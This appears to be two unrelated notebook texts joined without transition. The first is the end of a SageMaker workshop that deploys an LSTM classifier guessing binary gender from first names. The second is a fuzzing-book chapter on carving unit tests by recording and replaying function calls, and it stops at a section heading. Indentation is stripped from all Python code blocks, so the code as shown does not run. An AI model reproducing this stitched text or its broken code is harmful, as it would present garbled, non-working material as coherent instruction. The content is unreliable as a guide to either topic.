We feed this one-hot encoded test data to the model, and `predict` generates a vector, similar to the training labels vector we used before, except in this case it contains the gender the model predicts for each of the test records.<p>
To present the data intuitively, we simply map it back to `Male` / `Female` from the `0` / `1` flag.
```
!tar -zxvf ../pretrained-model/model.tar.gz -C ../pretrained-model/
model = load_model('../pretrained-model/lstm-gender-classifier-model.h5')
char_indices = np.load('../pretrained-model/lstm-gender-classifier-indices.npy').item()
max_name_length = char_indices['max_name_length']
char_indices.pop('max_name_length', None)
alphabet_size = len(char_indices)
print(char_indices)
print(max_name_length)
print(alphabet_size)
names_test = ["Tom","Allie","Jim","Sophie","John","Kayla","Mike","Amanda","Andrew"]
num_test = len(names_test)
X_test = np.zeros((num_test, max_name_length, alphabet_size))
for i,name in enumerate(names_test):
name = name.lower()
for t, char in enumerate(name):
X_test[i, t,char_indices[char]] = 1
predictions = model.predict(X_test)
for i,name in enumerate(names_test):
print("{} ({})".format(names_test[i],"M" if predictions[i][0]>predictions[i][1] else "F"))
```
## Model saving
In order to deploy the model behind a hosted endpoint, we need to save the model file to an S3 location.<p>
We can obtain the name of the S3 bucket from the execution role we attached to this Notebook instance. This should work if the policy granting read permission on IAM policies was attached, as per the documentation.
If for some reason it fails to fetch the associated bucket name, it asks the user to enter the name of the bucket. If asked, use the bucket that you created in Module-3, such as 'smworkshop-firstname-lastname'.<p>
It is important to ensure that this is the same S3 bucket, to which you provided access in the Execution role used while creating this Notebook instance.
```
sts = boto3.client('sts')
iam = boto3.client('iam')
caller = sts.get_caller_identity()
account = caller['Account']
arn = caller['Arn']
role = arn[arn.find("/AmazonSageMaker")+1:arn.find("/SageMaker")]
timestamp = role[role.find("Role-")+5:]
policyarn = "arn:aws:iam::{}:policy/service-role/AmazonSageMaker-ExecutionPolicy-{}".format(account, timestamp)
s3bucketname = ""
policystatements = []
try:
policy = iam.get_policy(
PolicyArn=policyarn
)['Policy']
policyversion = policy['DefaultVersionId']
policystatements = iam.get_policy_version(
PolicyArn = policyarn,
VersionId = policyversion
)['PolicyVersion']['Document']['Statement']
except Exception as e:
s3bucketname=input("Which S3 bucket do you want to use to host training data and model? ")
for stmt in policystatements:
action = ""
actions = stmt['Action']
for act in actions:
if act == "s3:ListBucket":
action = act
break
if action == "s3:ListBucket":
resource = stmt['Resource'][0]
s3bucketname = resource[resource.find(":::")+3:]
print(s3bucketname)
s3 = boto3.resource('s3')
s3.meta.client.upload_file('../pretrained-model/model.tar.gz', s3bucketname, 'model/model.tar.gz')
```
# Model hosting
Amazon SageMaker provides a powerful orchestration framework that you can use to productionize your own machine learning algorithms, using any machine learning framework and programming language.<p>
This is possible because SageMaker, as a manager of containers, has standardized ways of interacting with your code running inside a Docker container. Since you are free to build a Docker container using whatever code and dependencies you like, this gives you the freedom to bring your own machinery.<p>
In the following steps, we'll containerize the prediction code and host the model behind an API endpoint.<p>
This would allow us to use the model from web-application, and put it into real use.<p>
The boilerplate code, which we affectionately call the `Dockerizer` framework, was made available on this Notebook instance by the Lifecycle Configuration that you used. Just look into the folder and ensure the necessary files are available as shown.<p>
```
<home>
└── container
    ├── byoa
    │   ├── train
    │   ├── predictor.py
    │   ├── serve
    │   ├── nginx.conf
    │   └── wsgi.py
    ├── build_and_push.sh
    ├── Dockerfile.cpu
    └── Dockerfile.gpu
```
```
os.chdir('../container')
os.getcwd()
!ls -Rl
```
* `Dockerfile` describes the container image and the accompanying script `build_and_push.sh` does the heavy lifting of building the container, and uploading it into an Amazon ECR repository
* The SageMaker container we'll be building serves prediction requests using a Flask-based application. `wsgi.py` is a wrapper to invoke the Flask application, while `nginx.conf` is the configuration for the nginx front end and `serve` is the program that launches the gunicorn server. These files can be used as-is, and are required to build the webserver stack serving prediction requests, following the architecture as shown:

* The file named `predictor.py` is where we need to package the code for generating inference using the trained model that was saved into an S3 bucket location by the training code during the training job run.<p>
* We'll write code into this file using Jupyter magic command - `writefile`.<p><br>
The first part of the file contains the necessary imports, as usual.
```
%%writefile byoa/predictor.py
# This is the file that implements a flask server to do inferences. It's the file that you will modify to
# implement the scoring for your own algorithm.
from __future__ import print_function
import os
import json
import pickle
from io import StringIO
import sys
import signal
import traceback
import numpy as np
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.layers import Embedding
from keras.layers import LSTM
from keras.models import load_model
import flask
import tensorflow as tf
import pandas as pd
from os import listdir, sep
from os.path import abspath, basename, isdir
from sys import argv
```
When run within an instantiated container, SageMaker makes the trained model available locally at `/opt/ml`
```
%%writefile -a byoa/predictor.py
prefix = '/opt/ml/'
model_path = os.path.join(prefix, 'model')
```
The machinery to produce inferences is wrapped in a singleton class, aptly named `ScoringService`.<p>
We create class variables in this class to hold the loaded model, the character indices, the TensorFlow graph, and anything else that needs to be referenced while generating predictions.
```
%%writefile -a byoa/predictor.py
# A singleton for holding the model. This simply loads the model and holds it.
# It has a predict function that does a prediction based on the model and the input data.
class ScoringService(object):
model_type = None # Where we keep the model type, qualified by hyperparameters used during training
model = None # Where we keep the model when it's loaded
graph = None
indices = None # Where we keep the indices of Alphabet when it's loaded
```
Generally, we have to provide class methods to load the model and related artefacts from the model path assigned by SageMaker within the running container.<p>
Notice here that SageMaker copies the artefacts from the S3 location (as defined during model creation) into the container's local file system.
```
%%writefile -a byoa/predictor.py
@classmethod
def get_indices(cls):
#Get the indices for Alphabet for this instance, loading it if it's not already loaded
if cls.indices == None:
model_type='lstm-gender-classifier'
index_path = os.path.join(model_path, '{}-indices.npy'.format(model_type))
if os.path.exists(index_path):
cls.indices = np.load(index_path).item()
else:
print("Character Indices not found.")
return cls.indices
@classmethod
def get_model(cls):
#Get the model object for this instance, loading it if it's not already loaded
if cls.model == None:
model_type='lstm-gender-classifier'
mod_path = os.path.join(model_path, '{}-model.h5'.format(model_type))
if os.path.exists(mod_path):
cls.model = load_model(mod_path)
cls.model._make_predict_function()
cls.graph = tf.get_default_graph()
else:
print("LSTM Model not found.")
return cls.model
```
Finally, inside another class method, named `predict`, we provide the code that we used earlier to generate predictions.<p>
The only difference from our previous test prediction (in the development notebook) is that here the predictor grabs the data from the `input` variable, which in turn is obtained from the HTTP request payload.
```
%%writefile -a byoa/predictor.py
@classmethod
def predict(cls, input):
mod = cls.get_model()
ind = cls.get_indices()
result = {}
if mod == None:
print("Model not loaded.")
else:
if 'max_name_length' not in ind:
max_name_length = 15
alphabet_size = 26
else:
max_name_length = ind['max_name_length']
ind.pop('max_name_length', None)
alphabet_size = len(ind)
inputs_list = input.strip('\n').split(",")
num_inputs = len(inputs_list)
X_test = np.zeros((num_inputs, max_name_length, alphabet_size))
for i,name in enumerate(inputs_list):
name = name.lower().strip('\n')
for t, char in enumerate(name):
if char in ind:
X_test[i, t,ind[char]] = 1
with cls.graph.as_default():
predictions = mod.predict(X_test)
for i,name in enumerate(inputs_list):
result[name] = 'M' if predictions[i][0]>predictions[i][1] else 'F'
print("{} ({})".format(inputs_list[i],"M" if predictions[i][0]>predictions[i][1] else "F"))
return json.dumps(result)
```
With the prediction code captured, we move on to define the Flask app, and provide a `ping` route, which SageMaker uses to conduct health checks on the container instances behind the hosted prediction endpoint.<p>
Here we have the container return a healthy response, with status code `200`, when everything goes well.<p>
For simplicity, we are only validating whether the model has been loaded in this case. In practice, this route provides an opportunity for more extensive health checks (including checks of any external dependencies), as required.
```
%%writefile -a byoa/predictor.py
# The flask app for serving predictions
app = flask.Flask(__name__)
@app.route('/ping', methods=['GET'])
def ping():
#Determine if the container is working and healthy.
# Declare it healthy if we can load the model successfully.
health = ScoringService.get_model() is not None and ScoringService.get_indices() is not None
status = 200 if health else 404
return flask.Response(response='\n', status=status, mimetype='application/json')
```
Last but not least, we define a `transformation` method that intercepts the HTTP requests coming through to the SageMaker hosted endpoint.<p>
Here we have the opportunity to decide what type of data we accept with the request. In this particular example, we are accepting only `CSV` formatted data, decoding the data, and invoking prediction.<p>
The response is similarly funneled back to the caller with a MIME type of `CSV`.<p>
You are free to choose any or multiple MIME types for your requests and responses. However, if you choose to do so, it is within this method that we have to transform the data to and from a format suitable to be passed for prediction.
```
%%writefile -a byoa/predictor.py
@app.route('/invocations', methods=['POST'])
def transformation():
#Do an inference on a single batch of data
data = None
# Convert from CSV to pandas
if flask.request.content_type == 'text/csv':
data = flask.request.data.decode('utf-8')
else:
return flask.Response(response='This predictor only supports CSV data', status=415, mimetype='text/plain')
print('Invoked with {} records'.format(data.count(",")+1))
# Do the prediction
predictions = ScoringService.predict(data)
result = ""
for prediction in predictions:
result = result + prediction
return flask.Response(response=result, status=200, mimetype='text/csv')
```
Note that in containerizing our custom LSTM algorithm, with `Keras` as the framework of our choice, we did not have to interact directly with the SageMaker API, even though the SageMaker API doesn't natively support `Keras`.<p>
This serves to show the power and flexibility offered by containerized machine learning pipeline on SageMaker.
## Container publishing
In order to host and deploy the trained model using SageMaker, we need to build the `Docker` container, publish it to an `Amazon ECR` repository, and then use either the SageMaker console or the API to create the endpoint configuration and deploy the endpoint.<p>
Conceptually, the steps required for publishing are:<p>
1. Make the `predictor.py` file executable
2. Create an ECR repository within your default region
3. Build a Docker container with an identifiable name
4. Tag the image and publish it to the ECR repository
<p><br>
All of these are conveniently encapsulated inside `build_and_push` script. We simply run it with the unique name of our production run.
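Conceptually, the commands the script issues look roughly like the following dry-run sketch. The account id, region, and run name here are placeholders — the real script resolves them via the AWS CLI before executing the commands:

```python
# Dry-run sketch of the steps build_and_push.sh performs (assumed):
# the commands are assembled and printed, not executed.
run_name = "gender-classifier-1"                 # example image/repository name
account, region = "123456789012", "us-east-1"    # placeholders
repo = "{}.dkr.ecr.{}.amazonaws.com/{}".format(account, region, run_name)

steps = [
    "aws ecr create-repository --repository-name {}".format(run_name),
    "docker build -t {} .".format(run_name),
    "docker tag {}:latest {}:latest".format(run_name, repo),
    "docker push {}:latest".format(repo),
]
for cmd in steps:
    print(cmd)
```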
```
run_type='cpu'
instance_class = "p3" if run_type.lower()=='gpu' else "c4"
instance_type = "ml.{}.8xlarge".format(instance_class)
pipeline_name = 'gender-classifier'
run=input("Enter run version: ")
run_name = pipeline_name+"-"+run
if run_type == "cpu":
!cp "Dockerfile.cpu" "Dockerfile"
if run_type == "gpu":
!cp "Dockerfile.gpu" "Dockerfile"
!sh build_and_push.sh $run_name
```
## Orchestration
At this point, we could head to the ECR console, grab the ARN for the repository where we published the Docker image, and use the SageMaker console to create the hosted model and endpoint.<p>
However, it is often more convenient to automate these steps. In this notebook we do exactly that, using the `boto3` SageMaker API.<p>
The steps are as follows:<p>
* First we create a model hosting definition, by providing the S3 location of the model artifact and the ARN of the ECR image of the container.
* Using the model hosting definition, our next step is to create the configuration of a hosted endpoint that will be used to serve prediction generation requests.
* Creating the endpoint is the last step in the ML cycle; it prepares your model to serve client requests from applications.
* We wait until provisioning is completed and the endpoint is in service. At this point we can send requests to this endpoint and obtain gender predictions.
```
import sagemaker
sm_role = sagemaker.get_execution_role()
print("Using Role {}".format(sm_role))
acc = boto3.client('sts').get_caller_identity().get('Account')
reg = boto3.session.Session().region_name
sagemaker = boto3.client('sagemaker')
#Check if model already exists
model_name = "{}-model".format(run_name)
models = sagemaker.list_models(NameContains=model_name)['Models']
model_exists = False
if len(models) > 0:
for model in models:
if model['ModelName'] == model_name:
model_exists = True
break
#Delete model, if chosen
if model_exists == True:
choice = input("Model already exists, do you want to delete and create a fresh one (Y/N) ? ")
if choice.upper()[0:1] == "Y":
sagemaker.delete_model(ModelName = model_name)
model_exists = False
else:
print("Model - {} already exists".format(model_name))
if model_exists == False:
model_response = sagemaker.create_model(
ModelName=model_name,
PrimaryContainer={
'Image': '{}.dkr.ecr.{}.amazonaws.com/{}:latest'.format(acc, reg, run_name),
'ModelDataUrl': 's3://{}/model/model.tar.gz'.format(s3bucketname)
},
ExecutionRoleArn=sm_role,
Tags=[
{
'Key': 'Name',
'Value': model_name
}
]
)
print("{} Created at {}".format(model_response['ModelArn'],
model_response['ResponseMetadata']['HTTPHeaders']['date']))
#Check if endpoint configuration already exists
endpoint_config_name = "{}-endpoint-config".format(run_name)
endpoint_configs = sagemaker.list_endpoint_configs(NameContains=endpoint_config_name)['EndpointConfigs']
endpoint_config_exists = False
if len(endpoint_configs) > 0:
for endpoint_config in endpoint_configs:
if endpoint_config['EndpointConfigName'] == endpoint_config_name:
endpoint_config_exists = True
break
#Delete endpoint configuration, if chosen
if endpoint_config_exists == True:
choice = input("Endpoint Configuration already exists, do you want to delete and create a fresh one (Y/N) ? ")
if choice.upper()[0:1] == "Y":
sagemaker.delete_endpoint_config(EndpointConfigName = endpoint_config_name)
endpoint_config_exists = False
else:
print("Endpoint Configuration - {} already exists".format(endpoint_config_name))
if endpoint_config_exists == False:
endpoint_config_response = sagemaker.create_endpoint_config(
EndpointConfigName=endpoint_config_name,
ProductionVariants=[
{
'VariantName': 'default',
'ModelName': model_name,
'InitialInstanceCount': 1,
'InstanceType': instance_type,
'InitialVariantWeight': 1
},
],
Tags=[
{
'Key': 'Name',
'Value': endpoint_config_name
}
]
)
print("{} Created at {}".format(endpoint_config_response['EndpointConfigArn'],
endpoint_config_response['ResponseMetadata']['HTTPHeaders']['date']))
from ipywidgets import widgets
from IPython.display import display
#Check if endpoint already exists
endpoint_name = "{}-endpoint".format(run_name)
endpoints = sagemaker.list_endpoints(NameContains=endpoint_name)['Endpoints']
endpoint_exists = False
if len(endpoints) > 0:
for endpoint in endpoints:
if endpoint['EndpointName'] == endpoint_name:
endpoint_exists = True
break
#Delete endpoint, if chosen
if endpoint_exists == True:
choice = input("Endpoint already exists, do you want to delete and create a fresh one (Y/N) ? ")
if choice.upper()[0:1] == "Y":
sagemaker.delete_endpoint(EndpointName = endpoint_name)
print("Deleting Endpoint - {} ...".format(endpoint_name))
waiter = sagemaker.get_waiter('endpoint_deleted')
waiter.wait(EndpointName=endpoint_name,
WaiterConfig = {'Delay':1,'MaxAttempts':100})
endpoint_exists = False
print("Endpoint - {} deleted".format(endpoint_name))
else:
print("Endpoint - {} already exists".format(endpoint_name))
if endpoint_exists == False:
endpoint_response = sagemaker.create_endpoint(
EndpointName=endpoint_name,
EndpointConfigName=endpoint_config_name,
Tags=[
{
'Key': 'string',
'Value': endpoint_name
}
]
)
status='Creating'
sleep = 3
print("{} Endpoint : {}".format(status,endpoint_name))
bar = widgets.FloatProgress(min=0, description="Progress") # instantiate the bar
display(bar) # display the bar
while status != 'InService' and status != 'Failed' and status != 'OutOfService':
endpoint_response = sagemaker.describe_endpoint(
EndpointName=endpoint_name
)
status = endpoint_response['EndpointStatus']
time.sleep(sleep)
bar.value = bar.value + 1
if bar.value >= bar.max-1:
bar.max = int(bar.max*1.05)
if status != 'InService' and status != 'Failed' and status != 'OutOfService':
print(".", end='')
bar.max = bar.value
html = widgets.HTML(
value="<H2>Endpoint <b><u>{}</b></u> - {}</H2>".format(endpoint_response['EndpointName'], status)
)
display(html)
```
At the end we run a quick test to validate that we are able to generate meaningful predictions using the hosted endpoint, as we did locally using the model on the Notebook instance.
```
!aws sagemaker-runtime invoke-endpoint --endpoint-name "$run_name-endpoint" --body 'Tom,Allie,Jim,Sophie,John,Kayla,Mike,Amanda,Andrew' --content-type text/csv outfile
!cat outfile
```
Head back to Module-3 of the workshop now, to the section titled - `Integration`, and follow the steps described.<p>
You'll need to copy the endpoint name from the output of the cell below, to use in the Lambda function that will send request to this hosted endpoint.
```
print(endpoint_response['EndpointName'])
```
# Carving Unit Tests
So far, we have always generated _system input_, i.e. data that the program as a whole obtains via its input channels. If we are interested in testing only a small set of functions, having to go through the system can be very inefficient. This chapter introduces a technique known as _carving_, which, given a system test, automatically extracts a set of _unit tests_ that replicate the calls seen during the system test. The key idea is to _record_ such calls such that we can _replay_ them later – as a whole or selectively. On top, we also explore how to synthesize API grammars from carved unit tests; this means that we can _synthesize API tests without having to write a grammar at all._
**Prerequisites**
* Carving makes use of dynamic traces of function calls and variables, as introduced in the [chapter on configuration fuzzing](ConfigurationFuzzer.ipynb).
* Using grammars to test units was introduced in the [chapter on API fuzzing](APIFuzzer.ipynb).
```
import bookutils
import APIFuzzer
```
## Synopsis
<!-- Automatically generated. Do not edit. -->
To [use the code provided in this chapter](Importing.ipynb), write
```python
>>> from fuzzingbook.Carver import <identifier>
```
and then make use of the following features.
This chapter provides means to _record and replay function calls_ during a system test. Since individual function calls are much faster than a whole system run, such "carving" mechanisms have the potential to run tests much faster.
### Recording Calls
The `CallCarver` class records all calls occurring while it is active. It is used in conjunction with a `with` clause:
```python
>>> with CallCarver() as carver:
>>> y = my_sqrt(2)
>>> y = my_sqrt(4)
```
After execution, `called_functions()` lists the names of functions encountered:
```python
>>> carver.called_functions()
['my_sqrt', '__exit__']
```
The `arguments()` method lists the arguments recorded for a function. This is a mapping of the function name to a list of lists of arguments; each argument is a pair (parameter name, value).
```python
>>> carver.arguments('my_sqrt')
[[('x', 2)], [('x', 4)]]
```
Complex arguments are properly serialized, such that they can be easily restored.
### Synthesizing Calls
While such recorded arguments already could be turned into arguments and calls, a much nicer alternative is to create a _grammar_ for recorded calls. This allows us to synthesize arbitrary _combinations_ of arguments, and also offers a base for further customization of calls.
The `CallGrammarMiner` class turns a list of carved executions into a grammar.
```python
>>> my_sqrt_miner = CallGrammarMiner(carver)
>>> my_sqrt_grammar = my_sqrt_miner.mine_call_grammar()
>>> my_sqrt_grammar
{'<start>': ['<call>'],
'<call>': ['<my_sqrt>'],
'<my_sqrt-x>': ['2', '4'],
'<my_sqrt>': ['my_sqrt(<my_sqrt-x>)']}
```
This grammar can be used to synthesize calls.
```python
>>> fuzzer = GrammarCoverageFuzzer(my_sqrt_grammar)
>>> fuzzer.fuzz()
'my_sqrt(4)'
```
These calls can be executed in isolation, effectively extracting unit tests from system tests:
```python
>>> eval(fuzzer.fuzz())
1.414213562373095
```
## System Tests vs Unit Tests
Remember the URL grammar introduced for [grammar fuzzing](Grammars.ipynb)? With such a grammar, we can happily test a Web browser again and again, checking how it reacts to arbitrary page requests.
Let us define a very simple "web browser" that goes and downloads the content given by the URL.
```
import urllib.parse
def webbrowser(url):
"""Download the http/https resource given by the URL"""
import requests # Only import if needed
r = requests.get(url)
return r.text
```
Let us apply this on [fuzzingbook.org](https://www.fuzzingbook.org/) and measure the time, using the [Timer class](Timer.ipynb):
```
from Timer import Timer
with Timer() as webbrowser_timer:
fuzzingbook_contents = webbrowser(
"http://www.fuzzingbook.org/html/Fuzzer.html")
print("Downloaded %d bytes in %.2f seconds" %
(len(fuzzingbook_contents), webbrowser_timer.elapsed_time()))
fuzzingbook_contents[:100]
```
A full webbrowser, of course, would also render the HTML content. We can achieve this using these commands (but we don't, as we do not want to replicate the entire Web page here):
```python
from IPython.display import HTML, display
HTML(fuzzingbook_contents)
```
Having to start a whole browser (or having it render a Web page) again and again means lots of overhead, though – in particular if we want to test only a subset of its functionality. In particular, after a change in the code, we would prefer to test only the subset of functions that is affected by the change, rather than running the well-tested functions again and again.
Let us assume we change the function that takes care of parsing the given URL and decomposing it into the individual elements – the scheme ("http"), the network location (`"www.fuzzingbook.com"`), or the path (`"/html/Fuzzer.html"`). This function is named `urlparse()`:
```
from urllib.parse import urlparse
urlparse('https://www.fuzzingbook.com/html/Carver.html')
```
You see how the individual elements of the URL – the _scheme_ (`"https"`), the _network location_ (`"www.fuzzingbook.com"`), or the path (`"/html/Carver.html"`) – are all properly identified. Other elements (like `params`, `query`, or `fragment`) are empty, because they were not part of our input.
The interesting thing is that executing only `urlparse()` is orders of magnitude faster than running all of `webbrowser()`. Let us measure the factor:
```
runs = 1000
with Timer() as urlparse_timer:
for i in range(runs):
urlparse('https://www.fuzzingbook.com/html/Carver.html')
avg_urlparse_time = urlparse_timer.elapsed_time() / runs
avg_urlparse_time
```
Compare this to the time required by the webbrowser
```
webbrowser_timer.elapsed_time()
```
The difference in time is huge:
```
webbrowser_timer.elapsed_time() / avg_urlparse_time
```
Hence, in the time it takes to run `webbrowser()` once, we can have _tens of thousands_ of executions of `urlparse()` – and this does not even take into account the time it takes the browser to render the downloaded HTML, to run the included scripts, and whatever else happens when a Web page is loaded. Hence, strategies that allow us to test at the _unit_ level are very promising as they can save lots of overhead.
## Carving Unit Tests
Testing methods and functions at the unit level requires a very good understanding of the individual units to be tested as well as their interplay with other units. Setting up an appropriate infrastructure and writing unit tests by hand thus is demanding, yet rewarding. There is, however, an interesting alternative to writing unit tests by hand. The technique of _carving_ automatically _converts system tests into unit tests_ by means of recording and replaying function calls:
1. During a system test (given or generated), we _record_ all calls into a function, including all arguments and other variables the function reads.
2. From these, we synthesize a self-contained _unit test_ that reconstructs the function call with all arguments.
3. This unit test can be executed (replayed) at any time with high efficiency.
In the remainder of this chapter, let us explore these steps.
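The record-and-replay idea can be illustrated with a toy decorator that records the arguments of every call, so that each call can later be replayed in isolation. This only captures calls to the one wrapped function — the `CallCarver` class developed in this chapter instead uses `sys.settrace()` to capture all calls transparently:

```python
import functools

def recording(func, log):
    """Wrap func so that every call is appended to log as
    (function name, positional args, keyword args)."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        log.append((func.__name__, args, kwargs))
        return func(*args, **kwargs)
    return wrapper

def square(x):
    return x * x

calls = []
square = recording(square, calls)

# "System test": exercise the function
square(3)
square(5)

# "Unit tests": replay each recorded call in isolation
replayed = [square(*args, **kwargs) for _, args, kwargs in list(calls)]
print(calls[:2], replayed)
```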
## Recording Calls
Our first challenge is to record function calls together with their arguments. (In the interest of simplicity, we restrict ourselves to arguments, ignoring any global variables or other non-arguments that are read by the function.) To record calls and arguments, we use the mechanism [we introduced for coverage](Coverage.ipynb): By setting up a tracer function, we track all calls into individual functions, also saving their arguments. Just like `Coverage` objects, we want `Carver` objects to be usable in conjunction with the `with` statement, such that we can trace a particular code block:
```python
with Carver() as carver:
function_to_be_traced()
c = carver.calls()
```
The initial definition supports this construct:
\todo{Get tracker from [dynamic invariants](DynamicInvariants.ipynb)}
```
import sys
class Carver(object):
def __init__(self, log=False):
self._log = log
self.reset()
def reset(self):
self._calls = {}
# Start of `with` block
def __enter__(self):
self.original_trace_function = sys.gettrace()
sys.settrace(self.traceit)
return self
# End of `with` block
def __exit__(self, exc_type, exc_value, tb):
sys.settrace(self.original_trace_function)
```
The actual work takes place in the `traceit()` method, which records all calls in the `_calls` attribute. First, we define two helper functions:
```
import inspect
def get_qualified_name(code):
"""Return the fully qualified name of the current function"""
name = code.co_name
module = inspect.getmodule(code)
if module is not None:
name = module.__name__ + "." + name
return name
def get_arguments(frame):
"""Return call arguments in the given frame"""
# When called, all arguments are local variables
arguments = [(var, frame.f_locals[var]) for var in frame.f_locals]
arguments.reverse() # Want same order as call
return arguments
class CallCarver(Carver):
def add_call(self, function_name, arguments):
"""Add given call to list of calls"""
if function_name not in self._calls:
self._calls[function_name] = []
self._calls[function_name].append(arguments)
# Tracking function: Record all calls and all args
def traceit(self, frame, event, arg):
if event != "call":
return None
code = frame.f_code
function_name = code.co_name
qualified_name = get_qualified_name(code)
arguments = get_arguments(frame)
self.add_call(function_name, arguments)
if qualified_name != function_name:
self.add_call(qualified_name, arguments)
if self._log:
print(simple_call_string(function_name, arguments))
return None
```
Finally, we need some convenience functions to access the calls:
```
class CallCarver(CallCarver):
def calls(self):
"""Return a dictionary of all calls traced."""
return self._calls
def arguments(self, function_name):
"""Return a list of all arguments of the given function
as (VAR, VALUE) pairs.
Raises an exception if the function was not traced."""
return self._calls[function_name]
def called_functions(self, qualified=False):
"""Return all functions called."""
if qualified:
return [function_name for function_name in self._calls.keys()
if function_name.find('.') >= 0]
else:
return [function_name for function_name in self._calls.keys()
if function_name.find('.') < 0]
```
### Recording my_sqrt()
Let's try out our new `Carver` class – first on a very simple function:
```
from Intro_Testing import my_sqrt
with CallCarver() as sqrt_carver:
my_sqrt(2)
my_sqrt(4)
```
We can retrieve all calls seen...
```
sqrt_carver.calls()
sqrt_carver.called_functions()
```
... as well as the arguments of a particular function:
```
sqrt_carver.arguments("my_sqrt")
```
We define a convenience function for nicer printing of these lists:
```
def simple_call_string(function_name, argument_list):
"""Return function_name(arg[0], arg[1], ...) as a string"""
return function_name + "(" + \
", ".join([var + "=" + repr(value)
for (var, value) in argument_list]) + ")"
for function_name in sqrt_carver.called_functions():
for argument_list in sqrt_carver.arguments(function_name):
print(simple_call_string(function_name, argument_list))
```
This is a syntax we can directly use to invoke `my_sqrt()` again:
```
eval("my_sqrt(x=2)")
```
### Carving urlparse()
What happens if we apply this to `webbrowser()`?
```
with CallCarver() as webbrowser_carver:
webbrowser("http://www.example.com")
```
We see that retrieving a URL from the Web requires quite some functionality:
```
function_list = webbrowser_carver.called_functions(qualified=True)
len(function_list)
print(function_list[:50])
```
Among several other functions, we also have a call to `urlparse()`:
```
urlparse_argument_list = webbrowser_carver.arguments("urllib.parse.urlparse")
urlparse_argument_list
```
Again, we can convert this into a well-formatted call:
```
urlparse_call = simple_call_string("urlparse", urlparse_argument_list[0])
urlparse_call
```
Again, we can re-execute this call:
```
eval(urlparse_call)
```
We now have successfully carved the call to `urlparse()` out of the `webbrowser()` execution.
## Replaying Calls
Replaying calls in their entirety and in all generality is tricky, as there are several challenges to be addressed. These include:
1. We need to be able to _access_ individual functions. If we access a function by name, the name must be in scope. If the name is not visible (for instance, because it is a name internal to the module), we must make it visible.
2. Any _resources_ accessed outside of arguments must be recorded and reconstructed for replay as well. This can be difficult if variables refer to external resources such as files or network resources.
3. _Complex objects_ must be reconstructed as well.
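To illustrate the first challenge, a small helper along these lines (a sketch; `resolve()` is not part of the chapter's code) can make a function accessible via its qualified name, even if that name is not in the current scope:

```python
import importlib

def resolve(qualified_name):
    """Return the function object for a dotted name such as 'urllib.parse.urlsplit'."""
    module_name, _, function_name = qualified_name.rpartition(".")
    module = importlib.import_module(module_name)
    return getattr(module, function_name)

urlsplit = resolve("urllib.parse.urlsplit")
print(urlsplit("http://www.example.com/").netloc)  # www.example.com
```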
These constraints make carving hard or even impossible if the function to be tested interacts heavily with its environment. To illustrate these issues, consider the `email.parser.parse()` method that is invoked in `webbrowser()`:
```
email_parse_argument_list = webbrowser_carver.arguments("email.parser.parse")
```
Calls to this method look like this:
```
email_parse_call = simple_call_string(
"email.parser.parse",
email_parse_argument_list[0])
email_parse_call
```
We see that `email.parser.parse()` is a method of an `email.parser.Parser` object, and that it receives a `StringIO` object as argument. Both are non-primitive values. How could we possibly reconstruct them?
### Serializing Objects
The answer to the problem of complex objects lies in creating a _persistent_ representation that can be _reconstructed_ at later points in time. This process is known as _serialization_; in Python, it is also known as _pickling_. The `pickle` module provides means to create a serialized representation of an object. Let us apply this on the `email.parser.Parser` object we just found:
```
import pickle
parser_object = email_parse_argument_list[0][0][1]
parser_object
pickled = pickle.dumps(parser_object)
pickled
```
From this string representing the serialized `email.parser.Parser` object, we can recreate the Parser object at any time:
```
unpickled_parser_object = pickle.loads(pickled)
unpickled_parser_object
```
The serialization mechanism allows us to produce a representation for all objects passed as parameters (assuming they can be pickled, that is). We can now extend the `simple_call_string()` function such that it automatically pickles objects. Additionally, we set it up such that if the first parameter is named `self` (i.e., it is a class method), we make it a method of the `self` object.
```
def call_value(value):
value_as_string = repr(value)
if value_as_string.find('<') >= 0:
# Complex object
value_as_string = "pickle.loads(" + repr(pickle.dumps(value)) + ")"
return value_as_string
def call_string(function_name, argument_list):
"""Return function_name(arg[0], arg[1], ...) as a string, pickling complex objects"""
if len(argument_list) > 0:
(first_var, first_value) = argument_list[0]
if first_var == "self":
# Make this a method call
method_name = function_name.split(".")[-1]
function_name = call_value(first_value) + "." + method_name
argument_list = argument_list[1:]
return function_name + "(" + \
", ".join([var + "=" + call_value(value)
for (var, value) in argument_list]) + ")"
```
Let us apply the extended `call_string()` method to create a call for `email.parser.parse()`, including pickled objects:
```
call = call_string("email.parser.parse", email_parse_argument_list[0])
print(call)
```
With this call involving the pickled object, we can now re-run the original call and obtain a valid result:
```
eval(call)
```
### All Calls
So far, we have seen only one call of `webbrowser()`. How many of the calls within `webbrowser()` can we actually carve and replay? Let us try this out and compute the numbers.
```
import traceback
import enum
import socket
all_functions = set(webbrowser_carver.called_functions(qualified=True))
call_success = set()
run_success = set()
exceptions_seen = set()
for function_name in webbrowser_carver.called_functions(qualified=True):
for argument_list in webbrowser_carver.arguments(function_name):
try:
call = call_string(function_name, argument_list)
call_success.add(function_name)
result = eval(call)
run_success.add(function_name)
except Exception as exc:
exceptions_seen.add(repr(exc))
# print("->", call, file=sys.stderr)
# traceback.print_exc()
# print("", file=sys.stderr)
continue
print("%d/%d calls (%.2f%%) successfully created and %d/%d calls (%.2f%%) successfully ran" % (
len(call_success), len(all_functions), len(
call_success) * 100 / len(all_functions),
len(run_success), len(all_functions), len(run_success) * 100 / len(all_functions)))
```
About half of the calls succeed. Let us take a look into some of the error messages we get:
```
for i in range(10):
print(list(exceptions_seen)[i])
```
We see that:
* **A large majority of calls could be converted into call strings.** Where this fails, it is mostly because non-serializable objects are being passed as arguments.
* **About half of the calls could be executed.** The error messages for the failing runs are varied; the most frequent being that some internal name is invoked that is not in scope.
Our carving mechanism should be taken with a grain of salt: We still do not cover the situation where external variables and values (such as global variables) are being accessed, and the serialization mechanism cannot recreate external resources. Still, if the function of interest falls among those that _can_ be carved and replayed, we can very effectively re-run its calls with their original arguments.
## Mining API Grammars from Carved Calls
So far, we have used carved calls to replay exactly the same invocations as originally encountered. However, we can also _mutate_ carved calls to effectively fuzz APIs with previously recorded arguments.
The general idea is as follows:
1. First, we record all calls of a specific function from a given execution of the program.
2. Second, we create a grammar that incorporates all these calls, with separate rules for each argument and alternatives for each value found; this allows us to produce calls that arbitrarily _recombine_ these arguments.
Let us explore these steps in the following sections.
### From Calls to Grammars
